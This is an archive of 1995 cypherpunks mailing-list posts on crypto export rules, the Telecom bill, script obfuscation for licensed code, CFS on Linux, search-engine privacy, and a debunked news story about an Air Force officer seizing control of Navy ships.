        35 D4 48 CF 9D F6 B0 91


        PS Sameer, thanks for the nym.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 21 Dec 95 16:12:06 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Telcom bill report
In-Reply-To: <01HZ2U34JNWW8Y53CL@mbcl.rutgers.edu>
Message-ID: <199512220011.TAA15741@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


>    The legislation would impose fines of up to $100,000 and prison terms
>    of up to two years on people who make "indecent" material
>    available to minors over computer networks. That could pose big
>    problems for companies that provide online information services.

Perhaps my memory is faulty, but it seems to me that the wording of this part
of the bill (S.652) has been amended a bit. Sec. 402 of 652 now amends Section 
223 (47 U.S.C. 223) subsection (a) to fine or imprison whoever "knowingly 
permits any telecommunications facility under his control to be used for any 
activity prohibited by paragraph (1) [indecent communication with intent to 
annoy blah blah] with the intent that it be used for such activity". (this is
from the "House Appropriation Bill as Passed by the Senate" version of S.652
on http://thomas.loc.gov)

This (new, I think) part requiring "intent that it be used for such activity"
looks like an enormous loophole to me. I can't think of many people who
provide communications services _with the intent that they be used to harass
[etc.] others with obscene [etc.] communications_. 

Could a lawyer comment on why intent would be easier to establish than I
believe offhand ?

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Thu, 21 Dec 95 20:58:29 PST
To: "Beavis B. Thoopit" <andr0id@midwest.net (Jason Rentz)
Subject: Re: ex encrypted script
Message-ID: <199512220457.UAA05102@software.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:57 PM 12/21/95 -0500, Beavis B. Thoopit wrote:
>> >| Is there a way to encrypt a script yet still allow it to be runnable?  I
>> >| know that the simple answer is to write it in C and compile it but I don't
>> >| have the means of doing that at the moment.  (i.e. there is not
compiler on
>> >| the system)
>> >| 
>> >| I thought of a few simple protections but they all involve decrypting
before
>> >| running.
>> >
>> >	Ever hear of chmod?  chown?
>> >Adam
>> 
>> The vendor also has superuser access..  chmod chown won't protect it.. :(
>
>I once had to obfuscate an awk script.  "Cryptography is Economics."  My
>job was to make it difficult for the enemy to steal the source.  There
>was a license agreement...
>
>The simple answer of "no" is right in the strong sense, but there are
>tricks to make life difficult for the amateur attacker.
>
>My approach was a self-decrypting program.  The "real" script was
>encrypted within the body of the encasing script.  For increased
>obfuscation, decrypt only small pieces at a time.
>
>
There is encrypt and then there is render useless to the reader.

A tale I hear is that when HP had to deliver operating system source to
the french government they stripped all comments and changed all variable
and subroutine names to 32 byte strings of I 1 0 (zero) and O (uppercase O).
It still compiled but was 100% useless to human readers.


--
John Pettitt
email:         jpettitt@well.sf.ca.us (home)
               jpp@software.net       (work)    






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Elliott <paul.elliott@hrnowl.lonestar.org>
Date: Thu, 21 Dec 95 14:08:38 PST
To: libernet@dartmouth.edu
Subject: GAK boycott, What are legal implications?
Message-ID: <30d9ca78.flight@flight.hrnowl.lonestar.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Here is a question for all of you cyber legal types out there.
This question presupposes: 

The NIST will complete its work on the GAK standard. But no law will be
passed (yet) regulating the use of encryption in the U. S. (The GAK standard 
is an attempt to create an environment in which such laws can be passed.) 
In the U.S., Big Company INC will start marketing a GAKed encryption 
product domesticly.

A bunch of cypherpunkish types will immediately try to organize a boycott
against BIG COMPANY.

What are the cypherpunks legal risks?

I seem to remember that back in the 70s, the NAACP lost a big case
with respect to their boycott in a southern city. As I recall there were people
in the street begging money for the NAACP because there was a > 10**6 $
judgement against the NAACP and they needed that much just to appeal.


- -- 
Paul Elliott                                  Telephone: 1-713-781-4543
Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
                                              Houston Texas 77063

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNnJ8/BUQYbUhJh5AQGbsgP/T0n31SqeuHt+7AbizymcEhu/78DUuym5
sj+MO3ruA9WcEBQUXfabuf/PgOwlrtUAcC3dISPvXwGbdygc9oHBfxSglLi48g7d
dvDS4wziRHF7N8sBsYn0ee9YyKhPd9U7Ci0ovOc5frFGSZ2Bt4hU703d7bR+6cB+
iHHqsPaAa6o=
=EPoj
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Chen <chen@best.com>
Date: Thu, 21 Dec 95 21:37:39 PST
To: nobody@REPLAY.COM (Anonymous)
Subject: Re: FWD: Intuit and SSNs
In-Reply-To: <199512211706.SAA10738@utopia.hacktic.nl>
Message-ID: <199512220537.VAA11469@shellx.best.com>
MIME-Version: 1.0
Content-Type: text/plain



> What does our man in Intuit have to say about this? 

Well, the check-writing business does not really fall within my
purview, but I'll see if the report is true.  Pretty idiotic, if so.

   - Mark -


--
Mark Chen 
chen@intuit.com
415/944-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Beavis B. Thoopit" <beavis@bioanalytical.com>
Date: Thu, 21 Dec 95 19:59:25 PST
To: andr0id@midwest.net (Jason Rentz)
Subject: Re: ex encrypted script
In-Reply-To: <199512212047.OAA19022@cdale1.midwest.net>
Message-ID: <199512220357.WAA02638@bioanalytical.com>
MIME-Version: 1.0
Content-Type: text/plain


> >| Is there a way to encrypt a script yet still allow it to be runnable?  I
> >| know that the simple answer is to write it in C and compile it but I don't
> >| have the means of doing that at the moment.  (i.e. there is not compiler on
> >| the system)
> >| 
> >| I thought of a few simple protections but they all involve decrypting before
> >| running.
> >
> >	Ever hear of chmod?  chown?
> >Adam
> 
> The vendor also has superuser access..  chmod chown won't protect it.. :(

I once had to obfuscate an awk script.  "Cryptography is Economics."  My
job was to make it difficult for the enemy to steal the source.  There
was a license agreement...

The simple answer of "no" is right in the strong sense, but there are
tricks to make life difficult for the amateur attacker.

My approach was a self-decrypting program.  The "real" script was
encrypted within the body of the encasing script.  For increased
obfuscation, decrypt only small pieces at a time.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill.Humphries@msn.fullfeed.com (Bill Humphries)
Date: Thu, 21 Dec 95 21:01:30 PST
To: cypherpunks@toad.com
Subject: Newsweek Nerd 50
Message-ID: <v01530502acffea606402@[199.184.183.25]>
MIME-Version: 1.0
Content-Type: text/plain


Okay, while you other cypherpunks were grousing about how you weren't going
to give Newsweek your hard-earned currency, I bought a copy. My pain, your
gain (on a significantly smaller scale than that messiah figure some of us
celebrate next week.)

Cypherpunk Notables on the List: "Newsweek's Epithet"

Phil Zimmerman: "Crypto Creator"

Marc Rotenberg: "Privacy Advocate"

Sameer Parekh: "Protector of Privacy"

Johan Helsingius: "Crusader"

and Steven Levy, who sometimes posts here has the byline on the "Year of
the Net" feature.

PS to Newsweek -- Prof. Hoffman should be called a "Data Goddess" not a
"Geek" for exposing those bogus factors the marketdroids want to use to
control their survey data back up to the population level.

Happy Holidays
Piss off Ralph Reed, Defend the 1st Amendment.

Bill Humphries






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Thu, 21 Dec 95 23:20:20 PST
To: cypherpunks@toad.com
Subject: Re: ex encrypted script
Message-ID: <v0153050fad000b64a813@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


>At 10:57 PM 12/21/95 -0500, Beavis B. Thoopit wrote:
>>> >| Is there a way to encrypt a script yet still allow it to be runnable?  I
>>> >| know that the simple answer is to write it in C and compile it but I
>>>don't
>>> >| have the means of doing that at the moment.  (i.e. there is not
>compiler on
>>> >| the system)
>>> >|
>>> >| I thought of a few simple protections but they all involve decrypting
>before
>>> >| running.
>>> >
>>> >    Ever hear of chmod?  chown?
>>> >Adam
>>>
>>> The vendor also has superuser access..  chmod chown won't protect it.. :(
>>
>>I once had to obfuscate an awk script.  "Cryptography is Economics."  My
>>job was to make it difficult for the enemy to steal the source.  There
>>was a license agreement...
>>
>>The simple answer of "no" is right in the strong sense, but there are
>>tricks to make life difficult for the amateur attacker.
>>
>>My approach was a self-decrypting program.  The "real" script was
>>encrypted within the body of the encasing script.  For increased
>>obfuscation, decrypt only small pieces at a time.
>>
>>
>There is encrypt and then there is render useless to the reader.
>
>A tale I hear is that when HP had to deliver operating system source to
>the french government they stripped all comments and changed all variable
>and subroutine names to 32 byte strings of I 1 0 (zero) and O (uppercase O).
>It still compiled but was 100% useless to human readers.

There is a commercial product out there from Gimpel Software called _The C
Shroud_. It removes all structure from the code, replacing it with gotos,
renames all the symbols to axxxxxxx, converts constants and strings to hex,
substitutes all #defines and expands all macros, strips all formatting and
comments, etc., resulting in a perfectly compilable, but infuriatingly
obfuscated set of source files.

-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
                                   |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Gehlbach <jeffg@HiWAAY.net>
Date: Thu, 21 Dec 95 21:29:10 PST
To: cypherpunks@toad.com
Subject: Re: ex encrypted script
Message-ID: <9512220528.AA24323@fly.HiWAAY.net>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

At 02:47 PM 12/21/95 -0600, you wrote:
>>| Is there a way to encrypt a script yet still allow it to be runnable?  I
>>| know that the simple answer is to write it in C and compile it but I don't
>>| have the means of doing that at the moment.  (i.e. there is not compiler on
>>| the system)
>>| 
>>| I thought of a few simple protections but they all involve decrypting before
>>| running.
>>
>>	Ever hear of chmod?  chown?
>>Adam
>
>The vendor also has superuser access..  chmod chown won't protect it.. :(

Because I am treading in unfamiliar waters, I will just throw this one on
the table, leaving the discussion to the big boys.  Have you considered
sudo?  I really am not familiar with its capabilities, so easy with the
flames :^>
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNpB5Y8AYvAI/GnhAQFx5gP/Ue+KaBLC7gOkH6qFEBKvrKIyvsmObUWU
fvJv59OW4hY+/hCFfqvio3+7wQhwgImin7uEU3gIz+O5hLBRnjhknCqqdmxVPH1F
XuwJSrSdmuLxyRgrSeSc/b2f93Mvu+2cD8VQb0h6QBwe7vfTFNwMqwfcS0a76r2x
lC8IOMH88K8=
=cIYu
-----END PGP SIGNATURE-----


-----BEGIN PGP SIGNED MESSAGE-----

At 02:47 PM 12/21/95 -0600, you wrote:
>>| Is there a way to encrypt a script yet still allow it to be runnable?  I
>>| know that the simple answer is to write it in C and compile it but I don't
>>| have the means of doing that at the moment.  (i.e. there is not compiler on
>>| the system)
>>| 
>>| I thought of a few simple protections but they all involve decrypting before
>>| running.
>>
>>	Ever hear of chmod?  chown?
>>Adam
>
>The vendor also has superuser access..  chmod chown won't protect it.. :(

Because I am treading in unfamiliar waters, I will just throw this one on the table, leaving the discussion to the big boys.  Have you considered sudo?  I really am not familiar with its capabilities, so easy with the flames :^>
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNpB5Y8AYvAI/GnhAQFx5gP/Ue+KaBLC7gOkH6qFEBKvrKIyvsmObUWU
fvJv59OW4hY+/hCFfqvio3+7wQhwgImin7uEU3gIz+O5hLBRnjhknCqqdmxVPH1F
XuwJSrSdmuLxyRgrSeSc/b2f93Mvu+2cD8VQb0h6QBwe7vfTFNwMqwfcS0a76r2x
lC8IOMH88K8=
=cIYu
-----END PGP SIGNATURE-----


---====<jeffg@hiwaay.net>====--- 
Finger for PGP key & Geek Code * No lemurs were harmed creating this sig.

 "The significant problems we face cannot be solved at the same level of 
  thinking we were at when we created them."	- Albert Einstein



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Gehlbach <jeffg@HiWAAY.net>
Date: Thu, 21 Dec 95 21:48:10 PST
To: cypherpunks@toad.com
Subject: Remote use=export?
Message-ID: <9512220547.AA27294@fly.HiWAAY.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I apologize if this is a dead horse, but...

Is granting use of crypto software running in the US to a remote user
outside the US considered exportation?  For example, if allow my friend in
Paris to use a PGP binary residing and running on my PC in Washington, is
either of us violating any ITAR or similar restrictions?
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNpGc48AYvAI/GnhAQHJnAQAxzOPDbj5dzy6Xu/45h+nipatGBgw7tvP
+kcHUypA+oMmx1tBuCEz3UjpWIBCY5Nf5LD1sNToHGXJdHtLHG1t7coes8jFHRfL
8mVJNMckuPxwv5rLSVR6i5kWqvaz9UYsEpdjR2tROmyKCEHwNC+yy1OfRP1F65xi
nEjvksPjv/U=
=DIg7
-----END PGP SIGNATURE-----
---====<jeffg@hiwaay.net>====--- 
Finger for PGP key & Geek Code * No lemurs were harmed creating this sig.

 "The significant problems we face cannot be solved at the same level of 
  thinking we were at when we created them."	- Albert Einstein





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Light Ray <fricke@mae.engr.ucdavis.edu>
Date: Fri, 22 Dec 95 00:00:39 PST
To: dc-stuff@fc.net
Subject: Air Force hacks Navy? Eeeek!
Message-ID: <Pine.HPP.3.91.951221235554.6915A-100000@roboben.engr.ucdavis.edu>
MIME-Version: 1.0
Content-Type: text/plain



Read this.  It's from the Electronic Telegraph, a neat web site in the UK.
This article was later posted to comp.risks, and hence, Risks Forum digest,
which is where I found it.  The paragraphs have been numbered for easy
reference.

----------------------------------------------------------------------------
(paragraph 0)
http://www.telegraph.co.uk/et/                                             
                                                                           
(paragraph 1)
A few clicks and then the e-mail message entered the ship's control
system...
                                                                              
War of the microchips: the day a hacker seized control of a US battleship

(paragraph 
2)                                                                              
BY SIMPLY dialing the Internet and entering some well-judged keystrokes, a
young US air force captain opened a potentially devastating new era in
warfare in a secret experiment conducted late last September. His target was
no less than gaining unauthorised control of the US Navy's Atlantic Fleet.
             
(paragraph 
3)                                                                 
Watching Pentagon VIPs were sceptical as the young officer attempted to do
something that the old Soviet Union had long tried to do and failed. He was
going to enter the very heart of the United States Navy's warships - their
command and control systems.
   
(paragraph 
4)                                                                                                                                                       
He was armed with nothing other than a shop-bought computer and modem. He
had no special insider knowledge but was known to be a computer whizzkid,
just like the people the Pentagon most want to keep out.
   
(paragraph 
5)                                                                           
As he connected with the local node of the Internet provider, the silence
was tangible. The next few seconds would be vital. Would the world's most
powerful navy be in a position to stop him?

(paragraph 
6)                                                                           
A few clicks and whirrs were the only signs of activity. And then a
seemingly simple e-mail message entered the target ship's computer system.
   
(paragraph 
7)                                                                           
First there was jubilation, then horror, back on dry land in the control
room at the Electronic Systems Centre at Hanscom Air Force Base in
Massachusetts. Within a few seconds the computer screen announced "Control
is complete."
                                                                              
(paragraph 8)
Out at sea, the Captain had no idea that command of his multi-million-dollar
warship had passed to another. One by one, more targeted ships surrendered
control as the codes buried in the e-mail message multiplied inside the
ships' computers. A whole naval battle group was, in effect, being run down
a phone-line. Fortunately, this invader was benevolent. But if he could do
it ...
                                                                              
(paragraph 9)
 Only very senior naval commanders were in the know as the
"Joint Warrior" exercise, a number of experiments to test defence systems,
unfolded between September 18-25. Taking over the warships was the
swiftest and most alarming of the electronic "raids" - and a true shock
for US military leaders. "This shows we have a long way to go in
protecting our information systems," said a senior executive at the
airbase where the experiment was conducted. 

(paragraph 10)                                                                              
The exact method of entry remains a classified secret. But the Pentagon
wanted to the first to test the extent of their vulnerability to the new
"cyberwarriors" - and had the confidence to admit it.
    
(paragraph 11)                                                                          
Now they believe they know what they are dealing with and the defences are
going up.
    
(paragraph 12)                                                                       
Reply to Electronic Telegraph - et@telegraph.co.uk
Electronic Telegraph is a Registered Service Mark of The Telegraph plc

--------------------------------------------------------------------------

This sounds very fantastic, like the plot of a movie.  Indeed, _Hackers_
featured a "worm" that took over control of the ballast of oil tankers.
Perhaps this is a case of a journalist being a good writer but not fully
understanding the topic at hand. 

Does anyone know how true this article is?  Or where we could find more
info?  If it is true, then this is almost scary. 

Let's pick the article apart: 

In paragraph (1), the author refers to "the day a hacker siezed control
over a US battleship."  I assume that "hacker" and "battleship" are being
used loosely, as, as noted in an IW-list posting that I received a few
minutes ago, there are no currently active US battleships. (?)

In paragraphs (2) and (5), the author refers to the "hacker" "dialing the
internet" and "[he] connected with the local node of the Internet
provider."  This implies that the whole operation was conducted over the
internet.  Do battleships even have internet connections?  They may.  But
the military certainly wouldn't dialup through a civilian ISP where their
data goes through unknown hands to perform a very secret operation. 
Everything is doubtlessly encrypted - was the attack performed with or
without keys?  Or was the crypto somehow bypassed? 
                         
The intruder is referred to as "young US air force captain" in par 2, a
"young officer" in par 3, a "computer whizzkid" in par 4, an "invader" in
par 8, and a "cyberwarrior" in par 10.  Who was he?  I would assume that
it was more likely a group of people who were "in the know." Even the
average "Joe Hacker" (is there such a thing?) would have trouble
controlling a "batteship" let alone through an ASCII connection. 

In par 2, the author states that the intruder was attempting to gain
"unauthorised control of the US Navy's Atlantic Fleet" (sic). If these
were indeed "Joint Warrior" experiments, then it would be authorized. 

Throughout the article, references are made to the attack beginning
with "a simple email message."  This could be possible, but it seems
that a higher means of control would be necessary.

Anyhow, the whole article seems factually incorrect.  I'm very 
interested in finding out more on what ACTUALLY happened, tho..

Tobin Fricke
fricke@roboben.engr.ucdavis.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 21 Dec 95 21:27:23 PST
To: Alex de Joode <usura@berserk.com>
Subject: Re: CFS and Linux
In-Reply-To: <199512201915.UAA00215@asylum.berserk.com>
Message-ID: <Pine.SUN.3.91.951222001714.9575A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Dec 1995, Alex de Joode wrote:

> Is there anyone out there that has CFS running with Linux ?
> 
> It installs fine on BSDi 2.0 but I'm unable to install it 
> under Linux, I would appreciate it if some one would help
> me out.

I've got it running fine under Linux.  To do this, you have to do several
things:

(1) Use RPC with the 'old style file' option, whatever that is...
(2) Edit out the _'s from the RPC-generated files
(3) Use the modified make command included in the README.

I, for one, hope that Matt Blaze fixes (or at least automates :)) these 
quirks in the new version due out RSN...

Jon Lasser
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 21 Dec 95 21:56:30 PST
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: on web standards: sent to Markoff
In-Reply-To: <199512210204.SAA26757@netcom20.netcom.com>
Message-ID: <Pine.SUN.3.91.951222004543.9575D-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Dec 1995, Vladimir Z. Nuri wrote:

> there's been MS flamewars on this list before, but Attila repeats
> various snippets that I find highly objectionable.
> 
> cpunk relevance: operation of the free market

*sigh*  "operation of the free market" isn't necessarily 
cypherpunk-relevant, unless of course all libertarianism is. I, for one, 
consider myself a cpherpunk, and not necessarily 100% behind free 
markets. (I'm still thinking about it.)

In short, can this *please* move off list?
Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@bilbo.suite.com (Jim Miller)
Date: Thu, 21 Dec 95 22:49:28 PST
To: prm-ml@rome.isl.sri.com
Subject: Re: Attacking Clipper with timing info?
Message-ID: <9512220648.AA17385@bilbo.suite.com>
MIME-Version: 1.0
Content-Type: text/plain


> I suppose the correct answer is, "It depends."
> 

> It depends on your definition of "should" in the above
> paragraph.  If "should" means "in keeping with the NSA's
> mission statement", then I believe the NSA should remain
> quite and exploit the vulnerability as a national
> technical asset.  If "should" means "in support of US
> commerce", then the answer would be that they should
> announce/fix the vulnerability.
> 

> I'm not sure from your tone which one you believe to be the
> correct definition.  :-) 

> 


I don't know myself.  That's why I still occasionally think about it.  It  
is sometimes comforting to think there is a US agency with the expertise  
of the NSA.  At other times I wonder if we're getting the most for our tax  
money.  Unfortunately, it would be impossible to generate a meaningful  
cost/benefit analysis even if the NSA was not a secret agency.

Of course, if we did not pax taxes there would be no need to wonder if  
we're getting our money's worth.  A self-funded,for-profit NSA?  Now  
there's a liberatarian idea if I ever heard one.

Jim_Miller@suite.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <Alan.Pugh@internetMCI.COM>
Date: Thu, 21 Dec 95 22:16:47 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: re: Encryption Rules Coming
Message-ID: <01HZ38W9ELSI95NNMH@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: amp * EMC.Ver #2.3 ] --

>    Encryption rules to be prepared

>    By Andrew Jack in Paris
=snip=
>   Highly sophisticated encryption technology already exists
>    in a number of countries including the US and Sweden. In
>    the US, companies already have access to these programs. A
>    growing number of businesses -- led by the banking sector
>    -- are demanding access to these programs.

ya know, if we could beat the following (true) statement into the
heads of the people who write this stuff, it would go far towards
making people understand how futile it is to try to stop the spread
of encryption technology. 

  "Highly sophisticated encryption technology already exists in every
country on the planet. Anyone with a modem and access to the internet
has access to these programs. The fact is that a very powerful
encryption program can actually be written by hand on a postcard and
mailed anywhere in the world."

i want to rant more on this but will spare the choir of this. is
anyone out there marketing "rsa in 3 lines of pearl" as a postcard?
i'm going to have it printed on a business card so i can hand them
out to demonstrate the foolishness of itar in my own way.

amp
<0003701548@mcimail.com> (since 10/31/88)
<alan.pugh@internetmci.com>
PGP Key = 57957C9D
PGP FP = FA 02 84 7D 82 57 78 E4  E2 1C 7B 88 62 A6 F9 F7 
December 22, 1995   0:45





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 21 Dec 95 18:20:40 PST
To: cypherpunks@toad.com
Subject: Alta Vista caches queries
Message-ID: <199512220220.DAA27203@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Here's one more reason to worry about the implications of web search
engines: I just stopped in on Digital's new Alta Vista page, and was
surprised to find that the query field was filled in--with a search I ran
3 or 4 days ago. I doublechecked my end pretty thoroughly (scrubbing all
the files that Netscape 2.0b3 [Mac] generates--caches, global history,
etc., and eventually reinstaling Netscape from scratch). And it look an
awful lot like Alta Vista cached by query according to my IP address.
      Maybe dynamically assigned IPs ain't such a bad idea after all...

Hieronymous
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMNoVRb3g0mNE55u1AQEWxAIAiknajMTLiPzKxl4Wz3hoJsE4ntsXQJiV
zNoz9LAW16+7+oFKKPwcjQCTi7heMstT9dP0GjCHmYuCl2cFcmQRbQ==
=HQ12
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 22 Dec 95 03:51:43 PST
To: cypherpunks@toad.com
Subject: Re: ex encrypted script
In-Reply-To: <199512220357.WAA02638@bioanalytical.com>
Message-ID: <9512221147.AA06064@all.net>
MIME-Version: 1.0
Content-Type: text


> > >| Is there a way to encrypt a script yet still allow it to be runnable?  I
> > >| know that the simple answer is to write it in C and compile it but I don't
> > >| have the means of doing that at the moment.  (i.e. there is not compiler on
> > >| the system)
> > >| 
> > >| I thought of a few simple protections but they all involve decrypting before
> > >| running.
> 
> I once had to obfuscate an awk script.  "Cryptography is Economics."  My
> job was to make it difficult for the enemy to steal the source.  There
> was a license agreement...
> 
> The simple answer of "no" is right in the strong sense, but there are
> tricks to make life difficult for the amateur attacker.
> 
> My approach was a self-decrypting program.  The "real" script was
> encrypted within the body of the encasing script.  For increased
> obfuscation, decrypt only small pieces at a time.

There is another technique by which the source is obscured by an
automatic rewrite mechanism.  This provides for both obscuration of the
source and the ability to determine who originated illicit copies.  I
believe it was first implemented by Gimbel Software as part of their
C-terp system (unpublished).  A paper on techniques for doing this has
also been published:

	"Operating System Protection Through Program Evolution"
	Computers and Security - 1992? 3? (F. Cohen)

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 22 Dec 95 04:06:16 PST
To: cypherpunks@toad.com
Subject: Navy hacked by Air Force?
Message-ID: <9512221202.AA06399@all.net>
MIME-Version: 1.0
Content-Type: text


Following is the actual text extracted from iw@all.net - I doubt if the
U.S. DoD will want to release all the details, but we can ask!

>From: iw@all.net
Subject: IW Mailing List iw/951221
---------------------------------------------
Moderator's Note:
Subject: Navy hacked by Air Force

I talked to some people I know about the perported IW attack on a
battleship by the Air Force, and I thought I would help debunk this
story, which my contacts tell me is "wildly inaccurate", but looking
at a few facts.  Let's start with the title:

> War of the microchips: the day a hacker seized control of a US battleship

There are NO active US battleships!!! And there weren't any last
September.  So, at a minimum, there are factual errors.

...
> BY SIMPLY dialing the Internet and entering some well-judged keystrokes,
> a young US air force captain opened a potentially devastating new era in
> warfare in a secret experiment conducted late last September.  His
> target was no less than gaining unauthorised control of the US Navy's
> Atlantic Fleet. 

According to my sources this was not "SIMPLY dialing the Internet and
entering some well-judged keystrokes".  It was a controlled experiment
with participation of both Navy and Air Force, and involved a great deal
of planning by a large number of people.  It was performed using DoD
owned and properly keyed cryptographic devices designed to be allowed to
communicate with the systems being attacked.

...
> He was armed with nothing other than a shop-bought computer and modem. 
> He had no special insider knowledge but was known to be a computer
> whizzkid, just like the people the Pentagon most want to keep out.

100% wrong - he was an insider, he had a great deal of assitance, he had
cryptographic devices and keys, and he had special insider knowledge. 
If he was an Air Force captain, he could not have been all that young. 
Whizzkids are usually considered teenagers.  Anyone know of any teenaged
AF captains these days?

...
> A few clicks and whirrs were the only signs of activity.  And then a
> seemingly simple e-mail message entered the target ship's computer
> system. 
...
> targeted ships surrendered control as the codes buried in the e-mail
> message multiplied inside the ships' computers.  A whole naval battle
> group was, in effect, being run down a phone-line.  Fortunately, this

Not quite.  This was not an email sent from some Internet site and email
messages did not multiply inside the ships' computers.  Furthermore, the
total bandwidth of a phone line is nowhere near enough to "run" a naval
battle group, or probably even a naval kitchen for that matter.

> The exact method of entry remains a classified secret.

The first (only?) really true part of the story.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Fri, 22 Dec 95 05:21:52 PST
To: Cypherpunks <jeffg@HiWAAY.net>
Subject: Re: Remote use=export?
In-Reply-To: <9512220547.AA27294@fly.HiWAAY.net>
Message-ID: <m0tT7SA-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Gehlbach writes:

: -----BEGIN PGP SIGNED MESSAGE-----
: 
: I apologize if this is a dead horse, but...
: 
: Is granting use of crypto software running in the US to a remote user
: outside the US considered exportation?  For example, if allow my friend in
: Paris to use a PGP binary residing and running on my PC in Washington, is
: either of us violating any ITAR or similar restrictions?

Nothing about the ITAR is unambiguous, but since what is forbidden is
``exporting'', which includes ``disclosing to foreign persons'', and
since use is not forbidden, it is hard to see how what you suggest
could violate the ITAR.  (And I don't know of any other U.S. law or
regulation that it could violate.)

On the other hand, it may violate French law, which, or so I
understand, does forbid the use of crypto unless the keys are made
available to the French government.  But I really don't know anything
about French law.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@cris.com>
Date: Fri, 22 Dec 95 08:37:15 PST
To: cypherpunks@toad.com
Subject: Re: Air Force hacks Navy? Eeeek!
In-Reply-To: <Pine.HPP.3.91.951221235554.6915A-100000@roboben.engr.ucdavis.edu>
Message-ID: <55wx7p3vfz.fsf@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


Light Ray <fricke@roboben.engr.ucdavis.edu> said:

LR> Read this.  It's from the Electronic Telegraph, a neat web site in
LR> the UK.  This article was later posted to comp.risks, and hence,
LR> Risks Forum digest, which is where I found it.  The paragraphs have
LR> been numbered for easy reference.

[...]

LR> Let's pick the article apart:

[...]

	I saw the IW article that Light Ray saw in the RISKS Digest,
and, while it raises some valid questions, it in turn has some internal
problems.  For example, the IW author apparently doesn't understand the
difference between a Navy captain (O-6) and an Air Force captain (O-3),
dismissing the whole story because a Navy captain would be far to old to
be a 'whizzkid'.  Problem is the story said it was an Air Force captain,
and a newly pinned AF captain would certainly be young enough to be
considered one in the military culture (had I stuck it out through ROTC,
I would have been able to make captain at 24).  While the ET article
looks like it was written by someone who didn't understand the fine
details of what happened, the IW article looks like it was written as
military smokescreen.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
